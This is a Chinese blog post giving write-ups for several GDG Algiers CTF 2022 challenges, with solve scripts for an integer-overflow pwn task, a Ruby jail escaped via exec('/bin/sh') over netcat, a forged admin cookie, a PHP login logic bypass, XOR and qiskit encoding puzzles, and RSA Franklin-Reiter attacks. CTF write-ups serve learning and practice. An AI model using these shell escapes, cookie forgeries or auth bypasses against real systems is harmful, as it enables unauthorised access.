[GDG CTF 2022] 几个小题,等WP

最新推荐文章于 2023-02-28 09:30:14 发布
最新推荐文章于 2023-02-28 09:30:14 发布
阅读量682 收藏 1
点赞数
分类专栏: CTF crypto CTF misc 文章标签: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/127237397
版权

pwn-counter

作出来的基本都是入门题,这题给了源码,有3个功能1是counter++,2是counter--,但到1就不再减,3是给flag但要求counter==0。由于counter是字节型的,直接加255将就会变成0

#include <stdio.h>
#include <stdlib.h>
#include <stdbool.h>
#include <unistd.h>
#include <errno.h>

#define NUM_BUF_SIZE 24
#define STRTOUL_BASE 10

void flag(void);

void disable_buffering(void);
void input_str(char *msg, char *str, size_t size);
unsigned long get_num(char *msg);

void flag(void) {
    system("cat flag.txt");
}

int main(int argc, char *argv[])
{
    unsigned char counter = 1;

    disable_buffering();

    while (true) {
        printf("Counter: %d\n", counter);
        puts("1) ++");
        puts("2) --");
        puts("3) Flag");
        puts("0) Exit");

        switch (get_num("Choice: ")) {
            case 1:
                counter++;
                break;
            case 2:
                if (counter > 1) {
                    counter--;
                }
                break;
            case 3:
                if (counter == 0) {
                    flag();
                } else {
                    puts("No.");
                }
                break;
            case 0:
                puts("Bye!");
            default:
                fprintf(stderr, "Invalid option\n");
                break;
        }

        putchar('\n');
    }

    return EXIT_SUCCESS;
}

void disable_buffering(void)
{
    setbuf(stdin, NULL);
    setbuf(stdout, NULL);
    setbuf(stderr, NULL);
}

void input_str(char *msg, char *str, size_t size)
{
    ssize_t num_bytes;

    fputs(msg, stdout);
    num_bytes = read(STDIN_FILENO, str, size - 1);
    if (num_bytes == -1) {
        perror("read");
        exit(EXIT_FAILURE);
    } else {
        str[num_bytes] = '\0';
    }

    return;
}

unsigned long get_num(char *msg)
{
    char str[NUM_BUF_SIZE] = { '\0' };
    char *endptr = NULL;
    unsigned long num;

    input_str(msg, str, NUM_BUF_SIZE);
    num = strtoul(str, &endptr, STRTOUL_BASE);
    if (errno == ERANGE) {
        perror("strtoul");
        exit(EXIT_FAILURE);
    }

    return num;
}

WP,其实可以不写程序,但手工还是太慢了。

from pwn import *

p = remote('pwn.chal.ctf.gdgalgiers.com', 1402)

context(arch='amd64', log_level='debug')

for i in range(255):
    p.sendlineafter(b'Choice: ',b'1')

p.sendline(b'3')

p.recvall()

#CyberErudites{1NtegeR_0v3rfloWS_ar3_Na$ty}

jail-Red Diamond

这种题型第1次见,应该是越狱吧,直接给了远端其它什么都没有,直接登上去,发现可以exec

┌──(kali㉿kali)-[~/ctf/notes_keeper]
└─$ nc -v jail.chal.ctf.gdgalgiers.com 1303
DNS fwd/rev mismatch: jail.chal.ctf.gdgalgiers.com != 90.161.154.34.bc.googleusercontent.com
jail.chal.ctf.gdgalgiers.com [34.154.161.90] 1303 (?) open
> Welcome to my personal calculator
> To end the program type EXIT
OPERATION : exec('/bin/sh')
ls
chall.rb
entrypoint.sh
flag.txt
cat flag.txt
CyberErudites{I_Th0ugh7_CAlcul4t0rs_C4n_OnlY_b3_eXploited_in_PYY}

web-cookauth

一般情况下是不作web题的,因为不会,但50分的题出来还可以看看,点出链接发现有admin,再点进去提示

Nope, must be the admin

结合名字cook auth,进开发者模式,找里边的cookie,发现一个叫_info_user的cookie

>>> bytes.fromhex('7b2275736572223a20226775657374227d')
b'{"user": "guest"}'

改为 admin

>>> b'{"user": "admin"}'.hex()
'7b2275736572223a202261646d696e227d'

 web-ezphp

这个源码有个BUG,很明显的逻辑问题,应该用或 ||而用了与&&,也就是说不成功也行

<?php
session_start();
include "flag.php";

if (!isset($_GET["login"]) || !isset($_GET["pass"]))
    die(show_source(__FILE__));

if ($_SESSION["admin"] == 1)
        echo $FLAG;

$login = $_GET["login"];
$password = $_GET["pass"];
$_SESSION["admin"] = 1;
if ($login !== "admin" && md5($password) !== "117080b3bcbd07588b4df032280f46a5")
{
    echo "Wrong password\n";
    $_SESSION["admin"] = 0;
}

?>
1

然后刷新两次(第1次=1,第2次得到flag)

misc-Kvant

啥意思不清楚,看上去是说一个量子计算机,加密分3次第1次单字节第2次双字节然后3字节,显然这种加密前后无关可以爆。

然后下了qiskit试,发现1字节就是把0,1变成01,10,两字节就是把00,01,10,11变为1000,0001,... 这样就可以直接查字典逆回来,显然它不是加密是编码。直接在原文上改了就。

不过后边有个小坑,前两天刚弄过,也不难。得到str时由于里边有0x80分导致自动用utf-8编码成c280,是不是作者在吐槽python的bytes<->str,反正python强制引入后很烦人。

对于密文,由于所有码都是1个1,7个0,导致编码后只有80会被编为c280,把enc.txt里的c2删掉就OK了。没有C2就str直接读不出来了,改用bytes,强烈建议数据操作时用bytes绕过str的utf8。

from qiskit import QuantumCircuit, assemble, Aer
sim = Aer.get_backend('aer_simulator')


def get_state(x):
    l = [0]* 2**len(x)
    l[int(x,2)] = 1
    return  l

def str2bin(s):
    return ''.join(bin(ord(i))[2:].zfill(8) for i in s)

def bin2str(a):
    return ''.join(chr(int(a[i:i+8],2)) for i in range(0,len(a),8))

def encode_1(initial_state):
    qc = QuantumCircuit(1)
    qc.initialize(initial_state)
    qc.x(0)
    qc.save_statevector()
    qobj = assemble(qc)
    state = sim.run(qobj).result()
    return list(state.get_statevector().real.astype(int))

def encode_2(initial_state):
    qc = QuantumCircuit(2)
    qc.initialize(initial_state)
    qc.cx(0,1)
    qc.save_statevector()
    qobj = assemble(qc)
    state = sim.run(qobj).result()
    return list(state.get_statevector().real.astype(int))

def encode_3(initial_state):
    qc = QuantumCircuit(3)
    qc.initialize(initial_state)
    qc.ccx(0,1,2)
    qc.save_statevector()


    qobj = assemble(qc)
    state = sim.run(qobj).result()
    return list(state.get_statevector().real.astype(int))



def  encrypt_1(word):
    enc = ""
    for _ in range(len(word)):
        st = get_state(word[_])
        enc+= ''.join(str(x) for x in encode_1(st))
    return enc
def encrypt_2(word):
    enc = ""
    for _ in range(0,len(word),2):
        st = get_state(word[_:_+2])
        enc+= ''.join(str(x) for x in encode_2(st))
    return enc
def encrypt_3(word):
    enc = ""
    for _ in range(0,len(word),3):
        st = get_state(word[_:_+3])
        enc+= ''.join(str(x) for x in encode_3(st))
    return enc

'''
with open("flag.txt","r") as f:
    flag = f.read()
flag = 'C'
flag = str2bin(flag)

enc_1 = encrypt_1(flag)

enc_2 = encrypt_2(enc_1)

enc_3 = encrypt_3(enc_2)

with open("test.txt","w") as f:
    f.write(bin2str(enc_3))
'''
ol = ['0','1']
dic1 = {}
for i in ol:
    dic1[encrypt_1(i)]=i

dic2 = {}
for i in ol:
    for j in ol:
        dic2[encrypt_2(i+j)] = i+j

dic3 = {}
for i in ol:
    for j in ol:
        for k in ol:
            dic3[encrypt_3(i+j+k)] = i+j+k

print(dic1, dic2, dic3)

data = open('enc2.txt', 'rb').read()
data = ''.join([bin(i)[2:].zfill(8) for i in data])
data = ''.join([ dic3[data[i:i+8]] for i in range(0, len(data), 8) ])
data = ''.join([ dic2[data[i:i+4]] for i in range(0, len(data), 4) ])
data = ''.join([ dic1[data[i:i+2]] for i in range(0, len(data), 2) ])
print(bin2str(data))
#CyberErudites{W3lc0m3_7o_th3_w0rld_0f_Qu4ntum_C0mput1ng!}

 reverse-traditions

这个直接给两个串异或

a = [86,232,72,60,0,91,171,127,210,152,94,223,44,29,52,32,16,180,189,125,242,136,253,98,237,70,164,122,5,15,245,91,247,61,151,247,152,66,119,107,218,213,74,7,242,126,39,2]

c = [21,145,42,89,114,30,217,10,182,241,42,186,95,102,112,97,79,247,209,73,214,172,180,33,178,30,148,40,90,87,170,21,199,10,200,163,240,118,3,52,136,225,36,99,194,19,90,2]

bytes([a[i]^c[i] for i in range(48)])
#CyberErudites{DA_Cl4$$IC_X0R_X_N07_Th4t_R4nd0m}

reverse-impossible_challenge

   v11[0] = 6;
    v11[1] = 60;
    v11[2] = 39;
    v11[3] = 32;
    v11[4] = 55;
    v11[5] = 0;
    v11[6] = 55;
    v11[7] = 48;
    v11[8] = 33;
    v11[9] = 44;
    v11[10] = 49;
    v11[11] = 32;
    v11[12] = 54;
    v11[13] = 62;
    v11[14] = 97;
    v11[15] = 32;
    v11[16] = 0;
    v11[17] = 26;
    v11[18] = 43;
    v11[19] = 10;
    v11[20] = 49;
    v11[21] = 45;
    v11[22] = 12;
    v11[23] = 11;
    v11[24] = 2;
    v11[25] = 26;
    v11[26] = 12;
    v11[27] = 97;
    v11[28] = 26;
    v11[29] = 116;
    v11[30] = 40;
    v11[31] = 53;
    v11[32] = 42;
    v11[33] = 97;
    v11[34] = 97;
    v11[35] = 44;
    v11[36] = 7;
    v11[37] = 41;
    v11[38] = 32;
    v11[39] = 56;
    dest = 0;
    v10 = 69;
    for ( i = 0; i <= 39; ++i )
    {
      src = LOBYTE(v11[i]) ^ v10;
      strncat(&dest, &src, 1uLL);
    }

数都给了,直接异或

a = [6,60,39,32,55,0,55,48,33,44,49,32,54,62,97,32,0,26,43,10,49,45,12,11,2,26,12,97,26,116,40,53,42,97,97,44,7,41,32,56]
v10 = 69
print(bytes([i^69 for i in a]))

crypto-eXORcist

输入一个key然后由这个key与flag异或,问题在于输出的时候作了个encode(),这样会被utf-8编码,好恶心。

#!/usr/bin/env python3
# Crypto challenge of eXORciste
import os 
#from flag import FLAG
FLAG = b'xxxxxxxxxxxxxxxxxxxx'
import random

def xor(message, key):
    return ''.join([chr(m^k) for m,k in zip(message, key)] )
    


def generate_key(length):
    random_seed = os.urandom(16)
    key = random_seed * (length //16) + random_seed[:(length % 16)]
    return key 



def main():
    print("Hello Stranger, send me your secret and I will make sure to roll it up")
    while True:
        message = input('>> ').encode()
        print(len(message))
        if len(message)<20:
            print('That is not a secret man!')
            exit()
        key = generate_key(len(message))
        print(key)
        offset = random.randint(0, len(message))
        print(offset)
        cipher = xor(message[:offset]+FLAG+message[offset:], key)
        print("> "+ cipher.encode().hex())


if __name__ == "__main__":
    main()

直接先进行utf-8还原,再异或

1,由于并没有中文,编码最多是两字节的,将两字节的负载直接取出即可。

2,zip进行xor里,返回的长度为最短的长度,key并不循环,直接用pwntools里的xor

3,encode并不是一定要编成两字节,仅当最高位为1时才编,所以一开始的时候可以多试几将就通过得到的未编码片断猜到flag,不过后来网站改了,所有字符都会高位为1,不再显示片段。

from pwn import *

p = remote('crypto.chal.ctf.gdgalgiers.com', 1002)

for i in range(1):
    p.sendlineafter(b'>> ', b'0'*320)
    p.recvuntil(b'> ')
    cipher = bytes.fromhex(p.recvline()[:-1].decode())
    c = cipher.decode('utf-8')

    v = []
    for i in c:
        t = i.encode()
        if len(t) == 1:
            v.append(t[0])
        else:
            t0 = (t[0] & 0x3)<<6
            v.append((t[1]&0x3f) + t0)
    c = bytes(v)
    key = xor(c[:16],b'0'*16)
    
    m = xor(c, key)
    print(m)

# CyberErudites{Y0u_kn0w_h0w_T0_XOR}
'''
b'0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000CyberErudites{Y0u_kn0w_h0w_T0_XOR}0000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000'
'''

crypto-The_Messager

按字符RSA加密,所以并不需要解密,只需要一个个试就可以

from Crypto.Util.number import bytes_to_long, getStrongPrime
from math import gcd
from flag import FLAG
from Crypto.Random import get_random_bytes



def encrypt(m):
    return pow(m,e,N)



e = 65537
p = getStrongPrime(512)
q = getStrongPrime(512)


# generate secure keys
result = 0
while (result !=1):
    p = getStrongPrime(512)
    q = getStrongPrime(512)
    result = gcd(e,(p-1)*(q-1)) 	

N = p * q

print("N = " + str(N))
print("e = " + str(e))

ct= []

for car in FLAG:
	ct.append(encrypt(car))

print("ct = "+str(ct))

WP

from values import *

flag = ''
for c in ct:
    for i in range(0x21,0x7f):
        if pow(i,e,N) == c:
            flag += chr(i)
            break 
    
print(flag)
#CyberErudites{RSA_1S_S1MPL3}

crypto-franklin-last-words

跟上题基本一样,只是加密里e=3,并且取了一个很大的m,由m+pow(i,3,N)加密,

from Crypto.Util.number import bytes_to_long, getStrongPrime
from math import gcd
from flag import FLAG
from Crypto.Random import get_random_bytes



def encrypt_message(m):
    return pow(m,e,N)


def advanced_encrypt(a,m):
	return encrypt_message(pow(a,3,N)+(m << 24))

e = 3
p = getStrongPrime(512)
q = getStrongPrime(512)


# generate secure keys
result = 0
while (result !=1):
    p = getStrongPrime(512)
    q = getStrongPrime(512)
    result = gcd(e,(p-1)*(q-1)) 	

N = p * q

print("N = " + str(N))
print("e = " + str(e))

rand = bytes_to_long(get_random_bytes(64))

ct = []
ct.append(encrypt_message(rand << 24))

for car in FLAG:
	ct.append(advanced_encrypt(car,rand))

print("ct = "+str(ct))

这里e很小,各个M之间相差也很小,正好适合短填充攻击。先用短填充模板得到m

def short_pad_attack(c1, c2, e, n):
    PRxy.<x,y> = PolynomialRing(Zmod(n))
    PRx.<xn> = PolynomialRing(Zmod(n))
    PRZZ.<xz,yz> = PolynomialRing(Zmod(n))

    g1 = x^e - c1
    g2 = (x+y)^e - c2

    q1 = g1.change_ring(PRZZ)
    q2 = g2.change_ring(PRZZ)

    h = q2.resultant(q1)
    h = h.univariate_polynomial()
    h = h.change_ring(PRx).subs(y=xn)
    h = h.monic()

    kbits = n.nbits()//(2*e*e)
    diff = h.small_roots(X=2^kbits, beta=0.5)[0]  # find root < 2^kbits with factor >= n^0.5

    return diff

def related_message_attack(c1, c2, diff, e, n):
    PRx.<x> = PolynomialRing(Zmod(n))
    g1 = x^e - c1
    g2 = (x+diff)^e - c2

    def gcd(g1, g2):
        while g2:
            g1, g2 = g2, g1 % g2
        return g1.monic()

    return -gcd(g1, g2)[0]


if __name__ == '__main__':
    n = 128704452311502431858930198880251272310127835853066867118127724648453996065794849896361864026440048456920428841973494939542251652347755395656512696329757941393301819624888067640984628166587498928291226622894829126692225620665358415985778838076183290137030890396001916620456369124216429276076622486278042629001
    e = 3

    # nbits = n.nbits()
    # kbits = nbits//(2*e*e)
    # print ("upper %d bits (of %d bits) is same" % (nbits-kbits, nbits))

    # ^^ = bit-wise XOR
    # http://doc.sagemath.org/html/en/faq/faq-usage.html#how-do-i-use-the-bitwise-xor-operator-in-sage
    # m1 = randrange(2^nbits)
    # m2 = m1 ^^ randrange(2^kbits)
    # c1 = pow(m1, e, n)
    # c2 = pow(m2, e, n)
    c1 = 21340757543584301785921441484183053451553315439245254915339588451884106542258661009436759738472587801036386643847752005362980150928908869053740830266273664899424683013780904331345502086236995074501779725358484854206059302399319323859279240268722523450455802058257892548941510959997370995292748578655762731064
    c2 = 53066819955389743890197631647873076075338086201977617516688228878534943391813622173359672220491899999289257725082621279332126787067021987817619363964027754585057494857755310178293620211144789491527192983726079040683600073569676641124270473179040250808117008272524876858340200385005503388452491343904776677382

    diff = short_pad_attack(c1, c2, e, n)
    print ("difference of two messages is %d" % diff)

    #print (m1)
    m1 = related_message_attack(c1, c2, diff, e, n)
    print (m1)
    #print (m2)
    print (m1 + diff)

'''
difference of two messages is 300763
166948911880587234600972597325398559800623586442106754544249387904660171481281804594820145380464642946591165741209919048255667796045110331101490851949349850578944
166948911880587234600972597325398559800623586442106754544249387904660171481281804594820145380464642946591165741209919048255667796045110331101490851949349850879707
'''

得到m和两个差300763正好是flag第1个字符C的3将幂

然后爆破即可

from message import *
#由于c0,c1只相关 ord('C')**3 = 300763 非常小,用短填充攻击求m  
m = 166948911880587234600972597325398559800623586442106754544249387904660171481281804594820145380464642946591165741209919048255667796045110331101490851949349850578944
#再逐个爆破字母
flag = ''
for i in range(1,len(ct)):
    for j in range(0x21,0x7f):
        v = pow(pow(j,3,N)+m, 3, N)
        if v == ct[i] :
            flag += chr(j)
            break 

print(flag)
#CyberErudites{Fr4nkl1n_W3_n33d_an0th3R_S3450N_A54P}

石氏是时试
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
writeup-DASCTF2020七月赛crypto第一bullshit
07-25 1205
bullshit 目如下: from flag import flag def pairing(a,b): shell = max(a, b) step = min(a, b) if step == b: flag = 0 else: flag = 1 return shell ** 2 + step * 2 + flag def encrypt(message): res = '' for i in ra...
*CTF 2022 easyRSA
m0_62506844的博客
04-18 1499
源码: from Crypto.Util.number import getStrongPrime from gmpy import next_prime from random import getrandbits from flag import flag p=getStrongPrime(1024) q=next_prime(p^((1<<900)-1)^getrandbits(300)) n=p*q e=65537 m=int(flag.encode('hex'),16) ass
2021-09-29
m0_57291352的博客
09-29 572
2021年“绿城杯”网络安全大赛 crypto RSA-1 from Crypto.Util.number import * import gmpy2 from flag import flag assert flag[:5]==b'flag{' m = bytes_to_long(flag) p = getPrime(1024) q = getPrime(1024) n = p * q print('n =',n) e = 0x10001 M = 2021 * m * 1001 * p c = pow
攻防世界streamgame1
qq_44370676的博客
10-14 973
目下下来的附件有两个,1个.py文件,1个二进制文件,.py文件内容如下: from flag import flag assert flag.startswith("flag{") # 作用:判断字符串是否以指定字符或子字符串开头flag{ assert flag.endswith("}") # 作用:判断字符串是否以指定字符或子字符串结尾},flag{},6个字节 assert len(flag)==25 # flag的长度为25字节,25-6=19个字节 #3<<2可以这么算,bin
streamgame系列的总结
qq_39153247的博客
05-01 4908
相信你能通过关键字搜索看到这篇文章一定是撸过QWB,HITB,CISCN其中之一的!!本是PWN手奈何不会只好去学CRYPTO!因为并没有从网上找到自己想要的那种能够WP,所以只能自己摸索着学习。下面就总结一下我在被streamgame这个小妖怪纠缠了好久之后的进步和感悟。共有QWB的streamgame1,2,3,4;HITB的streamgamex以及刚刚打完的CISCN的oldstreamg...
Welcome-BOT-GDG:这个机器人说欢迎新用户加入GDG卡塔尼亚电报组
05-18
GDG可以采用多种形式-从只有几个人聚在一起,到举行带有演示和技术讲座的大型聚会,再到诸如代码冲刺和黑客马拉松之类​​的活动。 截至2015年3月,全球目前有600多个GDG。 在其他电报组中配置“欢迎使用GDG” ...
gdg.es:西班牙GDG官方网站
02-05
GDG西班牙官方网站。 使用Travis CI在Firebase中部署。 先决条件 首先,安装依赖项: npm install 启动开发服务器 此命令在http://localhost:8080为应用提供服务,并为应用提供基本的URL路由: npm start 建立 ...
DesafioGDG1WebService:GDG的第一个挑战WebService
05-21
【标】"DesafioGDG1WebService:GDG的第一个挑战WebService"是一个关于Web服务的编程挑战,由Google Developer Group (GDG) 发起。这个挑战可能是为了促进开发者们对Web服务技术的理解和实践,尤其是Java相关的技术...
GDG-DevFest-App:GDG DevFest的应用程序模板
02-02
如果您尝试立即构建项目,则会收到一个错误消息,抱怨缺少key.properties文件,并且从/ GDG-DevFest-App-master / android / gradlew app:properties:中退出代码1。 为了解决这个问, 打开文件,并在以下几行中...
Andnyang2:GDG韩国的另一个Slack机器人
06-11
Andnyang2是一款由GDG(Google Developer Group)韩国开发的Slack机器人,它扩展了Slack的功能,为用户提供了更多的交互式体验。这个项目基于JavaScript编程语言,展示了JavaScript在构建实时通信应用中的强大能力。...
邑网杯 CTF 2021 ,cipher2 ADFGVX 解
euzen的博客
07-25 1553
目 这现场没有做出来,因为是集中比赛而且禁用互联网,废了九成功力。 目是一个python 2的源码。使用ADFGVX加密,随机生成一个7位的纯字母key,然后用这个key加密key本身和flag{...........},现在知道加密后的两个结果,求flag 。后来发现这个基本上就是第三方库pycipher上移植过来的,去掉了解密的代码。使用 pip install pycipher,安装这个库后可以使用解密函数,方便验证结果。 目代码如下: from flag import flag f
攻防世界:streamgame1(考点:LFSR)
MikeCoke的博客
02-18 1253
目: from flag import flag assert flag.startswith("flag{") # 作用:判断字符串是否以指定字符或子字符串开头flag{ assert flag.endswith("}") # 作用:判断字符串是否以指定字符或子字符串结尾},flag{},6个字节 assert len(flag)==25 # flag的长度为25字节,25-6=19个字节 #3<<2可以这么算,bin(3)=0b11向左移动2位变成1100,0b1100=12(十进制) d
RSA解密之大素数分解和共模攻击的Python实现
weixin_45616281的博客
12-21 4443
CTF密码学中关于RSA解密的部分解思路及过程,包括:大素数分解、RSA共模攻击的解析和Python实践。
格密码(Lattice)与NTRUEncrypt介绍
heartbewith的博客
08-22 2457
在http://www.hackdig.com/02/hack-57841.htm一文基础上,以更连续合理的逻辑解释格密码及二维SVP问的求解、LLL算法
[ASIS 2022] crypto部分
weixin_52640415的博客
10-16 1768
ASIS CTF 2022 crypto
CTF WriteUp】2021 starCTF部分Crypto
cccchhhh6819的博客
01-18 4344
(打比赛感想:大佬真TM多。。。) Crypto Crypto-GuessKey 目 from random import randint import os from flag import flag N=64 key=randint(0,2**N) print key key=bin(key)[2:].rjust(N,'0') count=0 while True: p=0 q=0 new_key='' zeros=[0] for j in range(len(key)): if key
开始了学习rsa第一步,攻防世界Crypto - 初识rsa
m0_74047686的博客
02-28 1596
攻防世界Crypto - 初识rsa,开始学习rsa算法,详细的解答
PyCrypto密码学库源码解析(二)RSA参数生成
O_1CxH的博客
08-15 3637
Python Crypto库源码解析(二) RSA参数生成 * 版权声明 * 引用请注明出处,转载请联系: h0.1c@foxmail.com 本文主要讲解pycrypto库中RSA参数生成的实现方法。主要涉及的模块是PublicKey.RSA 和其继承模块PublicKey._RSA。 Python Crypto库源码解析(二) RSA参数生成 0 本文需要的背景知识 0.1 R...
2021-09-20
m0_57291352的博客
09-20 190
streamgame2 from flag import flag assert flag.startswith("flag{") assert flag.endswith("}") assert len(flag)==27 def lfsr(R,mask): output = (R << 1) & 0xffffff i=(R&mask)&0xffffff lastbit=0 while i!=0: lastbit^=(i
oracle11gDG
最新发布
06-15
您的问是关于 Oracle 11g 数据库中的数据保护技术 Data Guard,是吗?Data Guard 是 Oracle 数据库的一项高可用性解决方案,它提供了数据备份、数据复制、故障转移和自动重建等功能。 Data Guard 可以通过将主数据库的数据实时复制到辅助数据库来实现数据保护,从而保障系统的高可用性和数据的安全性。在 Oracle 11g 中,Data Guard 进一步加强了数据保护的能力,提供了更加灵活的数据复制和故障转移方式,以及更高效的数据压缩和传输技术。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值